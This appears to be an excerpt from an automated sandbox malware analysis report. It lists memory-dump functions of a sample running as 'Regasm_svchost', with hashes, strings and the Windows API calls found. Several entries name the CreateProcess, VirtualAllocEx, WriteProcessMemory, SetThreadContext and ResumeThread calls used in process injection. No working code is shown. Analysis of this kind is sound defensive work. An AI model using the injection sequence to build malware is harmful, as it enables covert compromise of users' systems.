Opcode ID: 1b166d423496a2a43bb88a56ce2567212f100f4df914364017fcfeb64aa27e45
Instruction ID: c13996d428723985125e071e15207131026f1d2c8022dcaf19ee1d4cb33567e7
Opcode Fuzzy Hash: 1b166d423496a2a43bb88a56ce2567212f100f4df914364017fcfeb64aa27e45
Instruction Fuzzy Hash: F2A2D675A00228CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E85DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00A40024 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

W, xrefs: 00A40044

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: b3014d70c42f8ab75354d3b3b81d59e093161bec6ca4d497c97fddb702929f70
Instruction ID: fe07f442b723d7a6d5498c290a006161d30395b23a9d740e434a6f0a257f11f9
Opcode Fuzzy Hash: b3014d70c42f8ab75354d3b3b81d59e093161bec6ca4d497c97fddb702929f70
Instruction Fuzzy Hash: BFC19375E016588FDB58CF6AC944AD9BBF2AF89304F14C0EAD908AB365DB305E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D7060 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1053601b682a92cccfa98c7a649c1c516bdacc6b592bc1ccbf7061a3eead4c
Instruction ID: cd40ee225ae80dd1d99a33f277efb7614cde3900c49b5bd547c2d914aedac880
Opcode Fuzzy Hash: 0a1053601b682a92cccfa98c7a649c1c516bdacc6b592bc1ccbf7061a3eead4c
Instruction Fuzzy Hash: C6A10571D0C3D08FC7168B78985027ABBB1AF46310F1646ABE5A6CB3D2E335D909D762

Uniqueness

Uniqueness Score: -1.00%

Function 001D7F47 Relevance: 3.9, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PSLp, xrefs: 001D8331
PSLp, xrefs: 001D8319
PSLp, xrefs: 001D8325

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: PSLp$PSLp$PSLp
API String ID: 0-1929388776
Opcode ID: 575d475467c80bc0f59ea8c9a5741d74e8852fa75433b6d28b6c75edf831e336
Instruction ID: 0276f9c1970d52f42ac7bac74d6b5db7f8361b006795f49ba47d58f1cce0d45c
Opcode Fuzzy Hash: 575d475467c80bc0f59ea8c9a5741d74e8852fa75433b6d28b6c75edf831e336
Instruction Fuzzy Hash: 44610F32A08610CBCB248F79C8407BEB7A1EF44701F11856BE9669B7D1E735CC89DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D6194 Relevance: 3.9, Strings: 3, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fC=l, xrefs: 001D61FE
PSLp, xrefs: 001D61B0
PSLp, xrefs: 001D61A4

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: PSLp$PSLp$fC=l
API String ID: 0-2554540573
Opcode ID: 294ebc043b181f26aa4d32308ac0945b14220deecad783f79e2c241817839b12
Instruction ID: cd585864e6955c8eac11dc47d509a4a93789337d6eca475c35c61838b6ee0d9d
Opcode Fuzzy Hash: 294ebc043b181f26aa4d32308ac0945b14220deecad783f79e2c241817839b12
Instruction Fuzzy Hash: 33514571A082909FD7098B388C2076E7BA2AF96310F19856BE09ACB392DB35DC45C752

Uniqueness

Uniqueness Score: -1.00%

Function 00A4865C Relevance: 1.8, APIs: 1, Instructions: 327
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A4892F

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 24cf890baf5fb3900de383a6f6b891bb824b4826b72c9cb1cce897eee08f0a0e
Instruction ID: 9e1eb1a26c8899458d27e727ca621c1c1de5cb56a44f933bbcec2f69cb0227c9
Opcode Fuzzy Hash: 24cf890baf5fb3900de383a6f6b891bb824b4826b72c9cb1cce897eee08f0a0e
Instruction Fuzzy Hash: B5C14774D002298FDF20CFA4D845BEDBBB1BF49308F1195AAD919B7240DB749A89CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A48668 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A4892F

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6ddaceb4f1a2b68756a9d403b8c89c6fa97f147239b02c12702b02a021842e2a
Instruction ID: eebb2b88ddcf78af25592d68042355262be6205416778e668c04f2445b0e360f
Opcode Fuzzy Hash: 6ddaceb4f1a2b68756a9d403b8c89c6fa97f147239b02c12702b02a021842e2a
Instruction Fuzzy Hash: FEC15674D002298FCF20CFA4D845BEDBBB1BF49308F1095AAD919B7240DB749A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A48239 Relevance: 1.6, APIs: 1, Instructions: 119
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A48313

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b33c63197582b4c08474d18f3ecc175866b4320d242fb97203a22b4ea4b9812e
Instruction ID: 1bf68edb6a51b6892521314a87999cdde1323ad5c7938f1a0d510bf381603cab
Opcode Fuzzy Hash: b33c63197582b4c08474d18f3ecc175866b4320d242fb97203a22b4ea4b9812e
Instruction Fuzzy Hash: 2641BCB4D012589FCF00CFA9D984AEEBBF1BF49314F20942AE819BB250D775AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A48240 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A48313

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 19c77a2a10c72db6594a960bb79cf274f529278c7f1e00801a34d126df369b93
Instruction ID: 09996c279f7d91f736fff204fdaa928b59337401ef2db69abd02be2b03193721
Opcode Fuzzy Hash: 19c77a2a10c72db6594a960bb79cf274f529278c7f1e00801a34d126df369b93
Instruction Fuzzy Hash: 0541ACB4D012589FCF00CFA9D984AEEFBF1BB49314F10942AE819BB250D735AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A483C8 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A48482

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b48891cc216576773f5abbed0a72e3f8c90eed49a6965f79da1d089aa44f5d5a
Instruction ID: 1d7d4476fa5f4c803e1b9db6679399760d5912caa7c7bf9c0f545119f28fd9ad
Opcode Fuzzy Hash: b48891cc216576773f5abbed0a72e3f8c90eed49a6965f79da1d089aa44f5d5a
Instruction Fuzzy Hash: C541CBB8D042589FCF10CFA9E884AEEFBB1BF49314F10942AE815B7210D739A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A483D0 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A48482

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 257afd5e174d142108fe4d1976bea6b34d057d66a0a49fbe556a7dcc42994817
Instruction ID: f8dc5ac8a4adb5717ce529ac258877f6c4280f579f6b4eee8efd8fa8f0b48a71
Opcode Fuzzy Hash: 257afd5e174d142108fe4d1976bea6b34d057d66a0a49fbe556a7dcc42994817
Instruction Fuzzy Hash: A441BAB8D002589FCF10CFA9E884AEEFBB1BF49314F10942AE815B7200D735A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A480E0 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A48192

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a8ff1990e499691369d64d600df6272e6ee9277fc9838c66fc77c5fd0f4c9d65
Instruction ID: 5a3446c0f939f124077ed0b4a9a37884aa01125c2630174e96a98eb786d3906f
Opcode Fuzzy Hash: a8ff1990e499691369d64d600df6272e6ee9277fc9838c66fc77c5fd0f4c9d65
Instruction Fuzzy Hash: 5041AAB8D042589FCF10CFA9E884AEEFBB1BF49314F10941AE815B7200D735A916CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A480E8 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A48192

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 700b4ee07d188eabf9a4df67a8d43840a947cf0bf9c0aba575d8dae1698459e4
Instruction ID: 1817e20bf5e8f6d760b4a5a4ca3e64338e92f4abffb2b13a9e1b5b68ef77b5a9
Opcode Fuzzy Hash: 700b4ee07d188eabf9a4df67a8d43840a947cf0bf9c0aba575d8dae1698459e4
Instruction Fuzzy Hash: A24199B8D002589FCF10CFA9E884ADEBBB1BB49314F10941AE915B7200D735A916CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A47EF1 Relevance: 1.6, APIs: 1, Instructions: 97
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00A47FA7

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed3f6589217957204ee958d1e62645a6ca53713913ef9ebe4b25dcc7a1aefef7
Instruction ID: 06b30f0edae4602a52831424bd25cf4ac260966ad0cbdd45f783d3782d47cb18
Opcode Fuzzy Hash: ed3f6589217957204ee958d1e62645a6ca53713913ef9ebe4b25dcc7a1aefef7
Instruction Fuzzy Hash: 1D41ACB4D052589FCB10CFA9D884AEEFBF1BF89314F24842AE419B7240D779A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A47EF8 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00A47FA7

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 295088e99e8437f5e2a6ba0873b7f63cd9d16d4bf26ba254e58fa07d61227cf4
Instruction ID: 73157f2f21817dce72619bfcf43f1ba0f0baa4ca62642e746676d54adfa02983
Opcode Fuzzy Hash: 295088e99e8437f5e2a6ba0873b7f63cd9d16d4bf26ba254e58fa07d61227cf4
Instruction Fuzzy Hash: 6B41ACB4D042589FCB10CFA9D884AEEFBF1BF49314F24842AE419B7240D779A949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A47DD0 Relevance: 1.6, APIs: 1, Instructions: 78
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00A47E56

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a6b4db16e0e6af6e49715c10d75c71834e79284a12a81c8e8e5b7b40f217bdc2
Instruction ID: 0ff2e2692419448a0547f8df68cdf01d1d2dce8cc53c6a9f060c8d9b43478480
Opcode Fuzzy Hash: a6b4db16e0e6af6e49715c10d75c71834e79284a12a81c8e8e5b7b40f217bdc2
Instruction Fuzzy Hash: 4231FEB4D042589FCF10CFA9D885AEEFBB0AF89314F10941AE819B7300C735A902CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A47DD8 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 00A47E56

Memory Dump Source

Source File: 00000005.00000002.988207547.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a40000_Regasm_svchost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f0ed643418a61263d0a18aa543ae47047c17822cc0d5259fbd823769f0077b5d
Instruction ID: e6d69b4505c63a2001a57f78acec2b69edeaea75b18b62634853626baafc36e6
Opcode Fuzzy Hash: f0ed643418a61263d0a18aa543ae47047c17822cc0d5259fbd823769f0077b5d
Instruction Fuzzy Hash: E131BAB4D042589FCF10CFA9D885ADEFBB0AF89314F10942AE819B7300D735A905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001D5FF5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

fC=l, xrefs: 001D605F

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l
API String ID: 0-1664688535
Opcode ID: 2a5eceaaac43111d58c03852a5ab280f795c7318fe1b874fab02469f39177cd5
Instruction ID: 168189bdf862814570e6f93cd1602646de9234fb3b7ce32e490d967693f64f4a
Opcode Fuzzy Hash: 2a5eceaaac43111d58c03852a5ab280f795c7318fe1b874fab02469f39177cd5
Instruction Fuzzy Hash: C1517C71B0C2905FD7195B784C2067E7FA2AF96310F09856BE09ACB7D2DB748C45C752

Uniqueness

Uniqueness Score: -1.00%

Function 001D0304 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

fC=l, xrefs: 001D06BC

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l
API String ID: 0-1664688535
Opcode ID: 208e3b08acafe7b50684026d0ce758ddf8d94421075c39eb4fb0126aa7649d10
Instruction ID: 9e302238c8cf4f324269124e3b83f3d07adb8ffc7e4afa633ddd9d4bb159ff64
Opcode Fuzzy Hash: 208e3b08acafe7b50684026d0ce758ddf8d94421075c39eb4fb0126aa7649d10
Instruction Fuzzy Hash: FF514874E0410A8FCB09DFA5C944AAEB7B2FF8C301F21946AD519A73A4D734A901CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001D0683 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

fC=l, xrefs: 001D06BC

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: fC=l
API String ID: 0-1664688535
Opcode ID: b9aa7c37787155b42cedf6f881f44641b45b04c321a9062c29b00b36ad405285
Instruction ID: c6b828005c41d746e7dcc016a85da381fe6c3723d8a111cc2454634f339af3ed
Opcode Fuzzy Hash: b9aa7c37787155b42cedf6f881f44641b45b04c321a9062c29b00b36ad405285
Instruction Fuzzy Hash: 19416874E0410A8FCB09CFA5C944AEEB7B2FF8C300F25946AD419A73A4D734A901CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00A317E9 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

(, xrefs: 00A3172B

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: aad091e6d5feaebeadb1022fbf49d45a25cbf0725df8a4fe4c0ac4ea39094687
Instruction ID: 58af5e032675e258b7f18fd57110f5ee91a886632672c7fda3776d1718c7ea43
Opcode Fuzzy Hash: aad091e6d5feaebeadb1022fbf49d45a25cbf0725df8a4fe4c0ac4ea39094687
Instruction Fuzzy Hash: F1110575906228CFDB60CF94CD88FA9B7B5FB49304F2482DAE519A3292C7319E85DF00

Uniqueness

Uniqueness Score: -1.00%

Function 001D3E90 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

x(|k, xrefs: 001D3EBC

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: x(|k
API String ID: 0-3766210077
Opcode ID: 7d57a0d46a19d93c6cd145d3e36208fa3f29b65e1da8747abb7d729be65e00f4
Instruction ID: 716ac3ddbd75eb0a50ecc0d3cd14717d72e48e7ba27382084e1b4f7a4533eb70
Opcode Fuzzy Hash: 7d57a0d46a19d93c6cd145d3e36208fa3f29b65e1da8747abb7d729be65e00f4
Instruction Fuzzy Hash: 09F03970A0D3955ECB43EBB8945825CBFB19F06204F1641EFD448DB2A3DB344A88C762

Uniqueness

Uniqueness Score: -1.00%

Function 001D3F20 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

) , xrefs: 001D3F20

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-1056026076
Opcode ID: a27e6e6226dda5310e62e3512b88308c33240221d3c114f20a07296b2b376b28
Instruction ID: 5dc1b17afd7a0c53a68fb008273f11204a065c43d5000c2a96f413347906ca1c
Opcode Fuzzy Hash: a27e6e6226dda5310e62e3512b88308c33240221d3c114f20a07296b2b376b28
Instruction Fuzzy Hash: F7F03070D08348AFC742DBB8D80975DBBB59B45200F1141EBC81897352EB345A54CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001D3EA0 Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

x(|k, xrefs: 001D3EBC

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID: x(|k
API String ID: 0-3766210077
Opcode ID: 715bcfa3d7a31ec84a1882c54613ba217b1dfcd867d89dcc9d9ab14169b0cb76
Instruction ID: ff0d2bb3ca72e70012109393cd0668fdb665634cf6367d7af848fded755aa302
Opcode Fuzzy Hash: 715bcfa3d7a31ec84a1882c54613ba217b1dfcd867d89dcc9d9ab14169b0cb76
Instruction Fuzzy Hash: 4CE01230D082189FCB45FFF8D84825DBBF5DB44205F5105ADD908D7351EB309A84DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A30704 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7291cfc0367594bd9dc446b4e813f658306f3d79b9fa29aba023c9af78b28f43
Instruction ID: b6125d6d7a6611373b6f7a4a29da907b41b9c735f0a84ff5f50ad9ce464fb21f
Opcode Fuzzy Hash: 7291cfc0367594bd9dc446b4e813f658306f3d79b9fa29aba023c9af78b28f43
Instruction Fuzzy Hash: B6018C3084E3C86FCB03DB788860AC87FB0AF17214F0A81DBC8849B2A3C6354949D766

Uniqueness

Uniqueness Score: -1.00%

Function 001D85F1 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23abaa6debed130e0e9fccd84578bbd366086054c8976f57f565d14771643de
Instruction ID: 0159cd8493f986b868ba44854c880f896392c6b4433ffca0e97775a4a3ce8d5d
Opcode Fuzzy Hash: a23abaa6debed130e0e9fccd84578bbd366086054c8976f57f565d14771643de
Instruction Fuzzy Hash: B4811730E05295DFDB09DBA4C851BBEBBB2AF85308F1581ABE5959B381CB349D02CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D5DF3 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194eed9f69e6f25d0ea0d5606d2f0feb930ab87fb101379a4c5fa657674b05a0
Instruction ID: c4b85e3151d5311e64e43e1579730e87cf1c03d636db049f1857b2b988834cff
Opcode Fuzzy Hash: 194eed9f69e6f25d0ea0d5606d2f0feb930ab87fb101379a4c5fa657674b05a0
Instruction Fuzzy Hash: BA718930B0C6508FEB199B68C9507BEBBB3AF49300F16406BE18ADB791C7358D41CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001D8640 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dac7c0d91291c48725acb8a600049707e9a275fc2b5550810292bf700c76816
Instruction ID: 89b0f326928296afe659b7665bfb335fecf99c2d5d956270df45b73e78cdf6a4
Opcode Fuzzy Hash: 3dac7c0d91291c48725acb8a600049707e9a275fc2b5550810292bf700c76816
Instruction Fuzzy Hash: AC71E530E05295DFDB08DBA4C811ABEBBB2AF85308F158167E2A59B781CB35DD02CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D6318 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b541e79028cee1ed046b8844c109983170b66590024f2e2dcdf265e2515b29de
Instruction ID: 03d19b716849d4c96b76838c50d3ae3a6481da12fd134bfcb4693df9be5a74d2
Opcode Fuzzy Hash: b541e79028cee1ed046b8844c109983170b66590024f2e2dcdf265e2515b29de
Instruction Fuzzy Hash: 8171F034908204AFC7189FA4C95066DBBB2FF55304F1AC1ABC45A8B3A5DB34ED06CF52

Uniqueness

Uniqueness Score: -1.00%

Function 001D9180 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceada75f1f4547f267179307628c1c926c977560fc1b8e67c73c068ff4225077
Instruction ID: 4c533a041f437b27d70e81f31996707c002e1379dc0b2964674253b305bb539d
Opcode Fuzzy Hash: ceada75f1f4547f267179307628c1c926c977560fc1b8e67c73c068ff4225077
Instruction Fuzzy Hash: 1371FE70A0865A9FC704CF78C8586BEBBB2BF09314F15856BD145AB386C774E980CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001D9170 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 719050eb5e7920eade30bff03fb9c86b5c9ae6f87e5d10fb3de534824569f408
Instruction ID: cb24eb3e0b9a85be872bc2054e66bacc58a4b4b30f10d7fbe677b77bbe56e020
Opcode Fuzzy Hash: 719050eb5e7920eade30bff03fb9c86b5c9ae6f87e5d10fb3de534824569f408
Instruction Fuzzy Hash: A351BE70A0461ADFCB14DFA8C8846BEF7B2BF49314F218527E119AB395C774A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D5D9B Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed4329899be02b7294e91880a34b2a4de720a33816c92020dc6bbc2c555880f
Instruction ID: 07030dd2fdbf64288c729ca3295158038ccb39036411c4d4643ff5b05aad457c
Opcode Fuzzy Hash: 2ed4329899be02b7294e91880a34b2a4de720a33816c92020dc6bbc2c555880f
Instruction Fuzzy Hash: 68417971A0D6A09FD30A0B385C2027E7FA2BB52310F09856FE0EACA7D2D7358845C722

Uniqueness

Uniqueness Score: -1.00%

Function 001D6150 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

